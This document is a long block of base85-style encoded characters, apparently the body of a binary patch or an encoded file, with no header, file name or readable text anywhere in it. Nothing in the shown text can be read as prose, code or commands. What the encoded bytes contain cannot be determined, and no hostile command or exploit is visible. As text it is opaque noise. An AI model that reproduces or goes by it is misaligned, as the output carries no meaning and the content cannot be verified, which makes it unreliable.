z(a@i1PMg1+uig$$pkP@kWl2_zC(`P+43s!Tk(GhPLHJNJQ<{9o>N${SIV({@f>=a)KPLf z>A>7_0&EH0G9rGrAwaEwd~`OOa>UZ=HCt0#K02$*Tbi(;B~Z1^wmm(I{;>-$_6K>a zq4PU+m7US*uLgG0E8y#s`C_(tLfc6FWx0Lu$_n|L8P6XP9xag18q_+sC1sWlH;`CU z>o27WfJhSuxw=;~Xk2A|FYaqAuTo_s6MiebwGJqgXR!n8j{VjY;ae?9SKX+dsU8eM0lo{iN<_@gdg&~Jd+x2DqwY(M2vt~JK_>*4v97l%eHc69^ z#3%ZA#9vXpGHhngb*bflgF-c$kSuaJKn)ZZ^&qZp*CEM?|LEfp-L5rCIdW2z)a9P7 z#z7Kv;GWqoEhi0rV&(WCooJPpg018Ise)_?lDKa2Yw%uVe+z*M;K>`87%Uc^B2=Qu zACgYAE966&BKO1lAn^dl!bYE{zibR zt0Xp}!yJ9e;7tEpZuA#c5#?~_4FEwww};}343&D-w9b5R>B;1_A@xH~%D1=7=Qfb0 zdD|zT&r^6P^yab>JHouJDGmor^jQPHUyRK-c)v|l+cq*aVXj{sw!JbV5!zHWU5neR zUMfwjvnpV7ogJPqP|sg_v9Xiy-^=BS2R+<=>LF@4uVuRSS4Li+@7*jn zh0j`AOG*R=zy-TDd@Ef%vx_em>uO%US>c!V?c4y)Ph!a51{)e0`5m=O2^?)xdvG_k z5`R;XTfXL*&;Ba1m^@xwh`(mMO)J}h?wVFi0uxxkyD`0V= z>9(cmu|ji7>Orae(3t&fw2Cibr@al?FFIi9wHwESbbgEUMyVh@0zCbA5^Rkm~-q?bFTTc<2I2f4WI=uc9M2D$?E$3g)RYd5AKXT2G#T4j+ZH(tgd--}m#8iy)zBtitsHIc5kIz3PQ8MAH z&v}G@dIcD#26W?nj*qcJdqS-5*;hU-Pe00fr90bCmsT({{BfITMYH^lOEYl-yh|in zRLf;X6g1Ap#VNtxFrc9zY4G|h#-fnmS&NP$a=?2r17b(?`F&K`8LGk(3XY$J^-Oow%x+@a7jz5ni{PsTA*Q;L}QvX^o)yGgT9&oQz#Ettj zxb5i2C!t)fbrPDl+ism#n!$1_1#bHuI_FJXUY(^X$T@R)(FRxeoBh@J{Loi3tgb%@SkX&UBQ>4lqZWrIw!KV)pY%HW z?GV>)n$9MlZ1Vn4Y;5h_-hQo2C$S%$yL*=sLU*|B)Ra7A*uh15Q8xiWCmsI@SiT7z zTmi4Py>UF)HkPP7GH~G+ZJbYWn{yiuF-kx|zy5CB165xRG~v9Ichcke{UrtT12^XO zL(a?K3&IAWm5U~gVqez@foanf)SY)!l}-Xs)|Dkf#z_0C1JKe}e=>~x;r`a+0%DUB zW}F#XA9v0E>CCDW28NWOZyjc~%neNClOte;DPi@Dc-ala_i2=tg%YEKo42ueYUrMz z_r-J0AjtDKC#(Gi8&^fz%nNK6&s+lI zS;gSv%m*YohbD!+C88~#cF^_;#!}czzZMVhL|M|o|1*}i9w0hc%W zo+0qD$hj!7NoaNNDCd`bmV4UdZODSl!_CaRMXz#9kRAo1`aO#1SAQ=>D<> z%NNx*>W~+}_{x+hf~lEuEyz52?Odnwv&vA^_ZG(h=oDIIk}QK&CuiaEh=`YHRy+=) zr5S6RQ0iBFFHssn$SFTkiKBVnW#+kn51ZmR=Eb2@sxijIl)6KPsCl0vIJ1X!s*#>M ziCu6hF5h{~dAo^E<5_CQc_T@_&G0*4Vz*D{sVDyAf_&wXSJB+E*x$5A%a+a?%-eSK ztIY3j7x)9jwTdln<0#8?e(Z3+Dydt_ORhkE{5Y5yiiFk&btgr+#kj``p#}6to+55Z z_L-M~i!W1^PhLxHwNmw?gYCXshY*H4O;UVV2~Vhfb&%1PkY77D&3WWKZ}SC}-}+U& zsm&KG@#e{a@6D4V)Xm==7J6z$MytK*I-$D1`+J+e$KKhzibb{-pRNWN`bZSf9`y@H z9exip2$QY)rFG=JLVrs4@egpbCG7<%a{nf^`*Eo&fLJRJ5u1%U932elN7inPGZO#g zV30IuK#r2N=}spSVTX8v>A{fFthX$!^^#2O;$66w?h^VWv3pzihvKJ|jlyUSW^8Mm zY3igRetr(&m~NIB)`5ve#q1ZpHIAqn7}mVTGR=advu_I#MGDcEc_=(fkkAIiNYQ>; z66y?)8X(v-YBnDUE~bK8M0JbkK1fI?N)xJ_$%)11jm~&n7c#Vk@eq9M+-;qMl!bXT z+pB~hLOhb>OXcoCC}EJ@{I(Y4yz-1BS2_dhw7H&r>-6U`ep(w->v{*@<+B0JVsFQ` z=?W65P1@U)zS2b|7MakJ^t6v{(d8trn<--adJ=xg7=Gy#e$N5k6U+XA;O2pW`D>qr zlP7NEXAOE{f>)-Va0x1!c2L|GF8lD3`O6iTd~>;z?P{52%FjrQ^OUYQsTN$T7S_5i zJlK=0Tvs>c90`eC0J;un!!zj2ZGHBK5*-QF0_{X2JP$5B*}@zy;T|A0F&cvfux#w| zYi!9>0WSn=X}n+H2&;qV0Lip6ag-SCDc}v5E~x^UQZa#tY-B)yg;Aai$IC;ABi!Z} z_}P2}&aEca6P`^Z14R8nm3E?tGuqmSJKSgz3#?$E-JnqG54?6M>d*1};X_lmb`G?f zGR|~Slr}Fn({Kxr<<}F@aTT|?H+4J;6L$8dP>7g4M;WldW@R))%r(M$EbOw14Eg{D zy=LvkPg>0gN1P8K)bTE2@h(WOgD6xP-0_e4>3=}=F_}g!&@nm=@r30K*O4k22)km} zme7=96M?;?Ken{+w{4WkMfmDVv^^@?eh_|)DB}&`qp<-+xIS}dw0GB?bx}@y&V^;S zRV8QO-n&c()^|$(*oKL(FX!XP-%bl@*%De}wNf(4=;kj{oh%WD^$boP@CT>#UmT1^&(tddW0WscW5BZV zcz5{MdIp~{2emi3PYETT#D@1_+p+(OEGR~Bt&r`C{SWjjX*z_HLpnecr<#D%g`2|1r)~FBx=Rr%tPD z%;n>cbhE3cOPai3AUm(9r0YY8s5`uZ7qKMNI0;@ElE6oGv%>#o`OqU3erI+@uR~~9 zz{=9>>p@&K{DH06JzT4tM=@Sn7Bj-Q&#=4Y`hcRnWzg^>Mz#0|$=c1q6>r=T^Z3c1 zUo5I&@2>RFWVmaYZKNvsb%s%J=YXh&i%C`=9=n)?Ha7M==Ew2YuV7k6@L9BP?F z`zda>YLW7llH$`@p;Lshg%3rcBAfet;iZ-hYU8d*%hD|Vvpt*F%X4Z2^X|EpezQ9;f{$6*7t~aeK(0%ZWpiMb<#2EK`0ii5m&O*H|BuXM0K$(pNC3w>Ln^d=isQKc4*NQqU^_ zEN)3qw?xnsuJ+Wu4y*QExRV})v=AE5tB$St8eR%zhI=Tv6j&K}8i9@q3 zaFxsPli2_S9+f|1Edsr^L=H}&*uv-ptG%|w>>UX?!;%;VcVIn?M4nOgqHgQ}&S-84 zL;Kve6mLPH_=LTQTxTr@hz~?}TW?ut{rDs3dbJ2kF{w%^iFk2dS>bi=_Bb*8_Ip-4 zgvLjLy&YK9ZHV4RY?(%l#^w=76LY19{~l^dzoD{y3H6MDT$xA<`4F|oz4^!k=BS!} z)pE)qEfHY%#R^*-lkW2?PUJhFvnKBi|1X`Uc&<|op05C<2QnrVg02-G6i@q2J0)!o zENrqL^unp0CR`IdPvpw=&78Vk)a9$9n)=!)Z#P5xeaf5{r_y8FmnDWKF0WnRrG~bI z{3>v{SaPn31x2~gS|Jfz_VQap!ET#J#f?QSPfM^o?At&A^_-c%-8&XvrqTQibj{o& z=2~4vwo93721H}dB!iLOWp`dhTK)6Z_Bzfw>y4ywdnB!4tfEX@ z5}x?2qjxTPK`4*3DQWNt91foHju@9sw{_*|iy>TlNCsmBnaHnC8WW@#f!lL6_79#) zQ+_c!Y{vRVOa?0OI#m)B8eLGEzH4tGd)>_G`lGNbh2JiS-^`|9fA^W6A0J@CCwu9s zSb+LZkNs(pNEc-Fh}5YL=8M95a&F{Ug3sc-d+U>x&TcWx&XO5od%fxvzcOk}^3H_F z-o0N&a>BQeE}Xu5MX=(^S_Dq+q)&0Q%InM>tV{yXCU2`JNOa&u0<6x8%dM_rPFCMZ z5jo-M+-n%gopMraJrP}N`E2KJ$FD#j;S_ITAsswYpThBRWN<>bW1h8AlFpD)nKMY` zlTn#qKT@D`LocdpCcE>^#=Azblt$(SV(V*n{v=MHVLTc&O-BeeHySvV@x>=vo$rua z*`=28Rw4`+<0g&lKQ_ws4<2O3Ok@etmonM?_9S#^;r^>4;(-r>ONMq908Zgl}Sz zK5`^XbPlTiaIUn(F^CWc$7fLjEw}{IAKDTA^p!7>)DPdg6YTd>2_t;(4?m;Dj=0Ok znM$_{paMYbC}qqV5qcRQ_kwjdQ~_^k#vlj6m@OW{*!_4qDMJuH6vU2(8Y?Gz1nd}QA=ZKO| ze>F&6NbzbM@gVs8jJiK?^v!|a@n8!jz@vNz_o;C2z}p=P%xBmy-|PVU6?toE6*47A zb#HbYZG`JzjBFd(fa&VBv$r}vkc*i=!{OF^y24bzZ-*F%Xeq^!^`#; z0hHXjMS~wRBmFymh?tdhN9wc1p0VvwbgwL9HF#VOsZE-6Pa1|TipFjw&rY3&xt{U% zNKMf_)M=?^$QA`-%a8rBO!{@Dp0RIf5^D!xrs0bDptSnU01K?mdB8Iv4wyo%jPSnv zx^<1>64mdIcu#Ed!PRNLJSiG$A9F8_s9bcJbM+iSn#fjcQ>;G;(6@7(NU|N6K!NmO zu05QVKgeAWQ%vQ!W1Gu-IB{2lvybPT-o7Wb&zk%hk`0@gnB)B0bb3YG966otU6zyQ z;_J&dL^(N`0mKNrulW)mUm6jVcOAvi*l-$_sb=2;!Aq%>TSnO}0ZUTYs8UoKnquqLNB1AMcCAz6wu6{~ytffjz zTm)^ZwZElsfP4x4@fH^9JA_NblQ?rpzHiEt84Ef{4wU@W2N<_Ljw)$qcL;F{4r%D< zeWf+Qe0C#DPXWyP`8-mXkhPUQJ)so2__(?AUa5(=r}Fjbm^8aM)9U_aPw;W1qz7Q=RwB?44Jt@i10oK_ow>ufFJ5$EIFPe^3OVeP!WN^5lQKEPq zj(4R9_B5H2MeUWsc}-G+Z62ZfEA1JHdCbNZdn3p^y5L-6x7IB3%aus$R>2vec$e7# zblkE>Rs-tyt>cnf{NsA1-4fuSFSU_9G%4g9mw4N5H(O%#+ZC$bc1}Cx`vKZ}f+jR}vh2_w%Q=eXCR!ma5cm0`1ogp~;jgfsF=d=TYT3hO zo8TW+!)B9o!7YhP-vN=9EWA?}!7C8~76eZq_4!C&qA_kjSZIl^JUZ2Qk>dk1Q`$?E?%J7NJO7+TL&+C@W5Io2dJ_Bo>6Z zoF8Al^Y;y+z-H3ed;B)SGAH?}Ph++y8!XI6u(<1#Jv~1+7EnvetR>T+C(^|^i{v&; z_G1@Cyl8aCTc13bfh6hy`G5auJEwI9a0*)`shkB^qQW5N65s=Td1GZ6fDd2dIokzX z!?`E>fK%Ag9CY&x&phh9)cnPumlc|NrAa=g*bBHF5Is>1JDlcVU-O?1z#4q41_I&7=tBNe4Ky$?4jy(!IIsxr zSRe*S1~>L19_WJ&Gxi||$OA9OeIZa4uB%=G+=uH5mjk8Y#zHC|o&8O5PXm{*;&EYN z_mNm~N@jt?Il*h(L^+)`z($x|*IM8XJTl#Spgw%hrm+*)3eU}c04Rg?S2w4A>ajZi z>_b3bPXo{4r!r@O@cGE8{sP?n>-NX@3J~ORS?l0&p@$ph_F;n?1KPI^tcTT}h9Ti9 z>v82*l>`BS;XfL9(27mqYuIjLj`9(3|F1P|!tbSJkJbQ>i+-H{(M8R1IRyfsR>#0@ zn8~zyHT2oXJXIf6`Tt8T2WyL)FvsRQa19o}{3);jKGat?Ky!HAjPHQR@N!#WfU^Ic zC@j!Bc)8!Z&2DAc)b#kC3IE+^S zZNQRZedQF~fazcm5}x)NT+H zY+#`s;~*<|1T>SNPq1K5Cqe%3COXZ6;H$qmL93t*nA~g)L=- zrYxbE#rkbKGP!9)ME!e7b>}WPEbTs=(yBN%Jy-rJJw+ z3v-${=_lcGE_yQf

w$LyNf?eBe(WGEs)kFEFJ=QpQFYH#U)h5t_)rGzuSVJ!Yni zvA;^O$EQrt<5Om}D)2vvuGLNRXrLh=lsqn^5kEfmJZ-$(d^}&;cyaqVxLUjUc?om5 zyV{-T2MJ_4kUsF_X09$3=9_Z%X+#WCjAcT-6Qz(-wJ*&>%3&4@~YbC@vThAx4`<1 zIiv%MZvyXoEZe-DFtxqheOiCUIc`C}03C=N^nn2ik@L5+nd`X53DkA0rxKz{`EEZ4 zA!!G9&Dlux&%qORYZM}x)wzK$52f8Y2Arm*()gd=WptKJhw1HCm`{FtmMy`Tf=8@d z;dlMX=~CJJI4mThVV}0yvc<~vSU6Sxc$|K!zmZ>|XJ1a$4dB06LB@JiRDMj=AW>rh6?EqWO)ya_AcPGiUiABK5%LW5_oXSg(9$Z z?ERm(SS#ftv$64mFOY!|zIx)Svy7xJ zzIjB8N`x37#h3{o?9p205nSp@WteI{Z%!LQ7n=a9WL$1iXj=9jr4c;^FS`19oJ!ez zj@fJI66wY-w;W^qSY4W!b7s{x#LNC}*tmd98s~#@AHaUY5g{UsOV2ym_~V-+m4TRY zXeeiA62vyGNPH6S-h=-fjj1Whl~y1Pn^%lbu zgS5Jc$*D2!_Z5ySnlO&=Z{N^jvsMLxgoen|dUDy5TxR2!By()nS)m&#rWEzq$If(Q zL|I+B88a8GwBrLGU+lXOE|HagtB|Oko+X_Glhr_J0>##|>bex8mM5Zv-gSDjeegH%X05y^uapzYYBey1c1cQc=+4V*=-QU5%n@JsX`O2)tyA#hhL@!&5 z@<{%Ksz5wYubFsY>312g* zQ#2Fu?o>z(t-MF0vQI@tdi=X4`^Sis>`rbY&6)f7-Jak^r?LwMWbW1U1MI>Dg$pvF zeqLf((=a2&b38n7b&fA2nM0^cuE10YSH3Z?Xn=BggVdjy*LUI=Q{ryhiD(xox*v=^ zBu_Oq<47JEBHx%*6CC;-(cysj7=a^#I|}!#OcOxtaj@rf1^Q9D#&_( z(hGH>70uVZxZ%{w5ax*KX22fWq@CTij;5r(e&Yh$S>w`Wwpd!%2rl3Q8p*4vq~-U_wbyCF!61X(Aj7iU&64!!@b z(Tu@Wm|&C!`A9*u;To5cWW1!QYaeT~HuK>3>Joxt*tEOsVed6Zlq>z4WxkZWxTl0gZck{--e3kv7qn3-p-x}v-ZKitl&hjD#5=5 z87H#-0RH_%zyHxZ!Hfa{AzBv!fdcXZhaiVLf)xnn@^bDGyYpLpnjyIgM*T3xxToZK z%y3c^qH_Fn`RVWNp$1pCjn9{JT6ES;6-v~~%N}#Lr$Xik(h2VhOn%Sm;7MEXkYesX zK98@JLS7T;=EfWnO1x=|n_u-eiW;s%cTH%o_O9OcMgh+|l=|HNsL2Tt3@y38zWK#Y z+TB40{`T#V?@I5kq)6h3#@Th`BPBw0qrr%-f0g1Ypu)j$@*Jd))!B*JeblHlSbm9y z-pj;(av}6_A=9inwSc09N14eopkNZoEt@DXio4j$jpTkKvP!~5>p>H6q(&NXyTz$aOi=5+4cLR+AN@0Jm-!si!3k1BYt!3be10#KE|NPr z27-A@UoDeh11iYA2XbbbIBFxOk9qR^w#57(wIonfBeg!n_<-Th3&6m>&0hxHqrWLU z+!iVNHoKLTQNZM1{M-(&FPqV2QZ6vF)i<%5EN72aqfju-;y~V#sCuxpgV+(1Ll|s` znM(Teh@a;5Z6b1uN?_GPrI~pzQpGb4vci!{pTh?<3hH2x5|!4eB^a z*71n1ioOc%mX8Mo#T`^$ik--|K21&3v?$-`(Y^-GpBAc5cI4HeV{C%uGj|NjQTI)U zezFM{3iw8|P=12o3L^LJE}Jg1tMY>}7kF|Ik>-#5EOlNtKLE-~gVJP*9`I0ACr(>O z$vi}6yOO|*K=b5LM-3*Ac^v^NB63R&cS`gPBa8lCn>`dFYVq$)Y&>1>6os7+%A#af z@(;c}xX=ZnteDuL3X1gv*~X^YZ_y1(iD1aRZwh}mH8?8g5ABB@*0k&NcxQnbaA=4z zhSHxcp?M<8`ExStsbJE6upSI}|g z)=e1_m)oXxp$kW0wP@B6qUtN%3ZMzw@7KKaI-L)x*~5QN@U|12TrQ@{s{x(=7DX&Vll( zLniI!POXwGV;hy2*(!8)UCvgv7mhmTTB-9>c}61+-6+y14Vz{A@@T~8o?-m`zE=n# zM$sPCGQ%TG>4xD1h;|G!PgI&!Y`&=y*ymv(OdvXUOyhkDcklmB&XVR*T}b4C9rQtb z=NJCyFzTefUd^@1#DI=GIFF6rhd>|0#Mtng*l1DXxc_H9(icewXX~=};WCV!#>PXH zp2vpYA(1jz5MiWHJ=tLsvw`itCf2@)Py0#Dm`U^&3I5cP*0>9{qfngqEP{ce3u_Mg zZ=Xc@2RL}hw9eQjT(y?#S?eWqHmh~cowK5%!)J4Q8F`MX>OR%lffZei3aBa>hw-y* zo+kFIq{Ll*!ZX#@a#N&I5_Lk6t@m)6XfsQ@tdL0?;TQQ?w16S_eZi$()MJ!HNrK;F zGvUjTC(3>l+Qpm!V)C_L9YVNY9WA@)Il!v}_>CnK+IRF(@;%OSzQq*B>A2Zxy~ifU z_=o&7eUFUHWHOzX=-|UIm-BmjZ)=;^YBcgh)xj2I7pJAX{;9UuvGa|e3`@Qh#>9I# z02{`|?s>+;o3V%cI#mY9?60fC8ftN-rb2F_z<&-Ji@wrm=zXibnHM_gG2KXOEy5t8 ztzl0>j%z;CD>gmHs~A??#@HX+AFG%h^eYpQrYffDs*JH1l>qAx5-s^S`pbNnu4g_F zKl0lgT$wM8A_d75^#c{!G{0%}Q!TB<1H^)g>!>dF5Hz+crr(;g#RJWZZrLBV&)Ier#9IY!b+7=U9 zV6&jV{rIgqBpD1`YTqZ+ei`;!?Kib?l3!3Pa+2wHpI{Kiuja#-JgNQUNL`2=Y=oqn zZm|myw|0ipU>j{Au`>#Z&x0>`P$UFW+&xmLKx(F)c(GlV^uDsJ^Td3>CfPn*9S_CN zJhZ9pRhOwP_E}43Xac(|Bt49RJNt=B{SAg@C5M^(`9k2fH9a)vQ{!_6Y>L*D{(}#0 zP0>BIb;qA1LqY;?_U}Y#$VQG%0(|1wLDGdBNHisXC=b>?d_u(5r`cw}PBaGe%ko7m zHny0)Cmenq8VtVq$!a;4eSx6nge}_Y-sV;Jq#NNm&x|~R;=$ALfw9N`A{W8!n1|o( zE?|=;>y2Isru6S|SRV5?TJg-%IhT`yY*7=3Z7fdsP8+17aZ1X{Kht7%P99*@HGiHH zlA%edkVZ88&BwPKdG4i@n^0|&sm664p-n~+<=xMdKX3HAkD5!Vo*t(oH-21&{Fc1K zq#{(ocmGJ%_&_W)2(Wu5zx}w<<-%RfwsC3EB=lU768wagygv+o_F{ic^t)Bpn+I#T zhig5#+LJaG-FaWRQ>rHkr>=h(U9IA7%Gdp}`)ch!t)e$M;6Oj`+m$Z&&-YZP~$iK)U1&`-2=wL*nuwGM5rN>Ol+-O;ANQQ=`lp3IZ~^m#w1vG zy_%xVb)Z#Cd%6P;&Gw9O`LuXW*0b;VO0biIu!x(QzPez0J)Jx93fbC|4BVxQuWw$5 z`g77r6irDp_8DJofUR&*yg$glQ=!w`TI|HuOYgPdwkTWwr2CHT3Y3@mdD5t6;LNZD z3^8sYB%7kYejA^mTcx-DeH~h+w56J0()Iia7$0lHgl~X{?nAuZF_1>B+VHy!F_w_8 zVV?}RZ1&g|0TV%i*kDGTBmVcBvHBgLP&~BWVSFv%L(%671$~jukg?nSC$dK+PZ{#b zE1H&7LxV^^Jwx*R@>!FLyfn8mmX$*%l) ze>M+dc$c1WM-TT}j9hp)c?G_EheEZ~D>qFfw^tf3ejL0->v}Yn~SMk`q@-#*ai_7dL9N=+>~XyClQzdfv`s z_{W_;ARSXly$<(ty1`Cboa(z9TMzJFQ~u0+#qWI}%=;U;F5sRY!4Fg9;FAH=0J>~U zC(+RB6`?!hjUWDlrFqpim^DAeHXa*{(U3yagG66jE5*o%;1jin;gLJ^{>^>iJz51- zrEUA1H|jeILrlXI5h(WUH6zO&dW*Y(#fV3xtU6mV2niJlnMR;yihS~^$jCO|r^wU~ zRc`D96bl9Q`(8;9J_(aA3T{%er$yJ9`IS~=b6!bLrDH5J5Kg4Y!*s!c=c*K_ixz_~4Lf6y8|=ntJ={a74#IJe{YT ztMz4SjMOov1%ZrY(vN!wH(~yVlu4=eHcJg+|vNmsYR5N zX{fIk2ymmL{X(n)gk0 zORd0(alG}zcrWLUeenk?1?kK1gw5a`A!P*-@h>6UaTJBWj0vBJ`<5f}-zIp>Qzy*f zChf>w__xkm%sPwbVpnPDSEXFcYxBVE0Z(`P@Gx+Rt0QUT-Myn#<7gBPt&TAWQ0XT0 ztx__*%@9aiK$O2nbwVJCGyC*lqr!{1&_pfU<1g(ZrJY(*+>1O+#B2hV`h-y-Q_pP0 zuG%C#=#w2)5McDXeQXoCORY6oMkSK*RZ`GL9TV39U4DLAipDbWui0LXo?oG);~>wu zuLexX)(9s(C<5b^cEcY~=cA+-`v-0VaS~O-jCYoaf){BTf%D={)`ce#Epoa8T2!@@ z50HCt@RNmpZ111Uv}4F%G;xb1pEeIdVXq}GHG{sY%Y%YSi=Z45sypD%rvJy)JuPUW z1#6;B+qP}nwr$(?pSCJ(+qP}nwq2<@>-63?-SawLAR@jw;wi0*?(iVQ-1y6{Y2Rks z1^>r>)bLm3243S3F4yb+;Mqx}Ht=Gha%pi`>qpxSDewGXX-8)(0M6Y@AN5VC2??{e zNN&iav0v{ly)?S$_*nNNL{5%~sah}J`_7*C^-CWx!ZbJ?s5I)jP}Ck5&P=%7WsAMh zLC_E*ZTioRU7r0^eD4xQcJZ-#CFNMN;dg*()X}j4!kS>NW#4iBKbNOt?q$fM0?1Ax zmM5>=&aLAz|6LCkgyRe^G%ntb21+uz1eiQ!*J-+IS&>!C!wVLI0`J`4LYXiGqn6;F zCF~u5W0E-k37S=G)a`2Nix09qOb=n*%?BKw!46%x|46tQN>)O~kC90NWY7*U2-v~( z6XA`(5Pwpa5n5nstjLv2@P9eB;(J`3u;owSLtQyb;kw#FfwifVt%9~)<7HX5>sWGS19QGb~sqp_|+`SwrY? zLLy&<*#_5mBw){C_-Fwk66vTB z{XH*%>?d`P*stkoE+xAwv;;dj;Zp%@qF=$%k<~`8!Y#k0l?ah-Ar~$1{R;IdfXyK+ zbmAR4iJrIlStZ_RmVgQ=y2&^oD$7B*I6j+Ey)kCNJVr!hl852%R>_R3 zTXIXmoM3u^?^bQ6UrBr&oJnfS#3rF|{+Hi%+W9QGZdUrR=E4j9__dJ_Fg*fP(g-!P za)LlSljyow7YBucw_nT_&cc*$X(LEJhho6U-{5- zv2b)wyeclZ5f3_cbp)cmufl?RaPF@cK%ix`qOqk)$1?1xUehSBxRG@>EeAu z3K69}@uH0OP`cCMzL^HD@gK;tIl8%t$_HhYo_5!dGT6s-C3C^ty=(wPT{51W9_+?EDQS+Z1KMF4KuJr*uhp=d_ zQXFfq>FD`0evY+cY(BFYzIl<`;~hq4R~JbT#54|2ysm0CENM6blLM<0sbPdvuT%6c zx3{6-{+l$(Q&bbNI=BUhKc1bjT5UblYxBmItcu9h8Vv3pSN`oG17I>+JpxZ_u`#ZNREl zM7OeWY7at?7YQgyNp@}FNdEBBa+l7mbY0@TR2A<{LsOV=vjmzQoe!W190)4rZly?9 zdzDk(33SM7Q7&YUgRh+j7t~dV5YaKnW?PoVo0>;gyl088Jk*aP<~c4GItYI|!9wgawDv8Bg#XPicq|4w%mw)BVaCA{@D-5r$ z?hC9Q9>C7%uUO@5d^PIX@pFBdvS<_Axzd<7{`Q4w@jjYrz)r6d?#|bNMj)T``P6urkNC@87r6l>udWTSEZpQHV+eGJnCvk9I{01ruCSNL^nS-NWAj1()o;LMCbDK zoSHM7Hz)x3Q9L`?lK~t(O7|=Zo;#tX8QDVE*B+jw{!Su;ZZ&J5zqa~9nzD-(k2-fj zc2dTSbtrTm@9HeDcCm+z_YFXFn=ic~o{_z$>9l%xgLZJlp8q}|CH~moEG-)gju#Cn|=1^Z~8QLM^u>xy_fla0RHS4bm0BIdE$iFJ6a83Jh*oI7oci5=UDqtk9z!ZyN|!huf*}Ph8J~yyi;) zgi4)sNt~!Ko%Apr*2<|!Cll%0Cu>~)+3@7ro_9~k`((0KF~2lUh#qC}vdEt%*a)D_}@tqpva zuc{H=`LMC2c{SVUSUn4}vW{j{Lkr#%QqR|UX`-FLueGu>>~_=WA42EW4b9&^05M={ z_D@e>k(SU3{w(45vNg$`V9oGw-TNg1PsW!E^5!v_f*k%0$#5?jFaoWA)H%1QZ=*YH z%2)OPDzKzz{PIc#B|~epQ0r_}EMt->SF{+EHoe!^v#<{CpJdBU;uqjdFF6Di=NsAy z-9Z|LX>^Q79hS(xLo2#kpBlP96c_+`SJ*`0d$xnFZKJ~}i-ry|OJSXirrPQcd{zOk zc)3_0i4+chL`0I94q!~tFd`4)m$Y38yvu``a&yp=0puK7Z&}S8j@$=)HrfDdlh_mO zlq20t-7wq)jtbk`-a%Bkwvao723Ehj^}P8pQWhGzr6PU>n4SSVr{}=4wsOFL!S<-< z?o*+`ros;?B5xkulwM)k6qQCmn_v^@t*ojPu@fHAEaN#vmx%lLo`XMa+QgOxZ{UOIC``d>F}@Q8}; zcnHbWwbjk=N%Wwxf>RvXofCjnXKDZ}P`16<8neK?Qj{mn=$7%NN-XYNLjMYO&G+%* z<-6ma-_~1gwNdj#M&j;dGLu4Y_l)VbCr-JS{p77?eIg%@7uSJ0%O7(|p&YB*D86lX{40MFV!u!OPe@J_1K=vdpL(D%ro!S>_;qI_k%fVxW zm)HbkDKFG94OY7b(i=apiKIELA!rovEKyze~9ZCbPn&$ zxjC_~;}{jxIfpj^B;32Dd;+w<`np;3j~A; z1eE@0#e|l=T~Cb+NL(m+S->4CE`=0vkRyEO(aUdbX;UYwtx9ETnf({gzZpS>i<^Tn z_h{P6%gf4};Anv#ZOr{<*x0`jlb-9izFth0>^&H8%=z6`U8c-)=it|ErM45sOcn*D8Xao69rd&MMBUC0cR>V96cqXH15I42TdA4hE5}l0= zV2M9X91rMbpYkTrsy+}M)rpdtCZ2y3j(eiRlJmkD^ZGpe_&$2dXa!L^rnano{s)H; zA1{FS?qjb~KodcSMl(@d_#s>s{L|ToF)idMbj)Tg4>0+%TgbU=Z@biHh-OjTq>6_9 zgD7I)w4Z$daAsfMHuK@%YvcW?t#(`&%(RD`ep45zgt{`JuiU`(CVk4-Z^YQsrj?OY zc|Orx=CIx?3)llr=Hz1t1M$qhiQD%`-pa0_UnL5gx*1oVaWvbzOT<_!LVi|%iKwUy zUJ=;7LNZhsTl46j9cCJj>jE!0)|O+c?svml20x`LUn*TnxH% z;#r>49$udRrko$KZgfdo4Tj|4ml!h?KPb<2WVUCd#SLd2P)&`dj5oHs?6}h2LH0#x z(=1=BDJ(%VI9qp7=B_TRK-l8q;R%0s|MI5s7xS_yS| zU!H;u43?%HB9@HymDRxKV<13uhcv*MrN@XPo^<#kNe^^^q`&giKp{4oIFB??f&30m z?a?Ip`b`~K00Ee?1SUut>Q)n-Z{#6+;z8^C4V_TH1j~&R?sIBN(Ny2%N@i?bxKw|R zmnnQzW_SO^^FQ*YDP#tT4mRnRdJ6+32|?QeyT)qE?m&>x z8ma4?TDbJvqc4@3-d2I&#RZi@Y13thLHS!O%>_%71H>{iUrdn6>sDq;($Tjz#Y2s1 zTVhR3KS-mJS2AWM!Q-?R{Y2Nx1_G)JF^$HLdi5JM8TVRb>#yv}KH|I#8DDCv8vAAn zthp%yCs8sb!e(qyJrrZXHJ@wX``h>DXPfv*7b%_*;vk5)XvtROBHa~-*YLT}#EA}8 zNcyim0Nr*tmC&M-sOf|5n2PNjn{OECXe0ZrNZ1rZe>3qKFU8PMS723v2|f29uLlWo ztkW`Qj02-W|FXpj${dm)b;H(&?3E)caT3NgV3BbfAYnOD3wRKh)YiTsb4dnv@t8T> z_gpy~0^v_4wf$1~D1wbp^*4<=|5;dP z{>-+dw(ve5*-sS@#+>WF`E-$k-&PL%M<F!X{*A-(Kjf8*tP`ChAq72C9W~;uQ#`6pMG(aot0Xr89m#BZ-=7SBiJJQ3 z0hkzvfX6%umk~uI**uJ7ts(j*bg&4Ysa8|dH@iH`Vg4N46qzL0>(4sb8PvvMS@_X5 zN&|heo`$e*Xe;5?v=x8c8QRfBZHHrrNrea_C$Dy~_F58#y5Ah^?agS)r;{X}$1jWP zU(27{d=tYeB-4ejA>B}~seUAw^StTu0&=Hbl)Mn98`0aN57S_z@G835He7{wXJxCr z--56c4!R;JHu}?9+IT+ARzSuxh@1wxVFpnxjySk$SJMTs4Th*yd3r_i9o4K}S2ntd zt(cey-Ql4#;SeK5DE~x?{sXM&2aQqNFWAlth01%l`MEqSZ=N2chb+s&#Hsb!0dn2% zqRNi3QH=1O3um~o%l22yTg^r79lYr~p0B15t=t+R*>Z4v`$Z2nO@GEp8mVeT^)f>; z^bbfb@}!L{qJKYDH9wo9k%515cWZ0A*cvBOR2&md$SFO=+|_hOQeq}SGLC(ftyI^E z2DDmd?)gAzFq+?o#LQ~<+qFDS02+VQq5p-!=Z^Id9vgFrb4i)x_+q0n!lSxlg&vbQ zVwe>mGz4M=n*<`FD*suvfEG<~I}Xz50<+XHHY+mA&B}O%*w?A`R$w+Bm~7nPGReCB zJ&imW;k%(-xUvdG+wuudrTZO*NW_V}T~~UVh}V|9;oT1+*&)S>(e*y{0I){kHDF#Q zAi-U#qn|>Zvm8ceWEA9}QEwlRUd7Mk`djXX2O~PP?t70sXvTg;G{uUhO%+uljR(A& z`d~>)-3dl=nGQEm2@#A(STV|$z%Hcfq(JAHK8>%K?neAv2M~nuGbkor%RWWAv*8_! z1q$*EiiMNI(E%x-eu7mq0B|FY?%>2&@-KyqnfhSq7ecgmQ?u;FsU}ElKdpR`=G9sJ 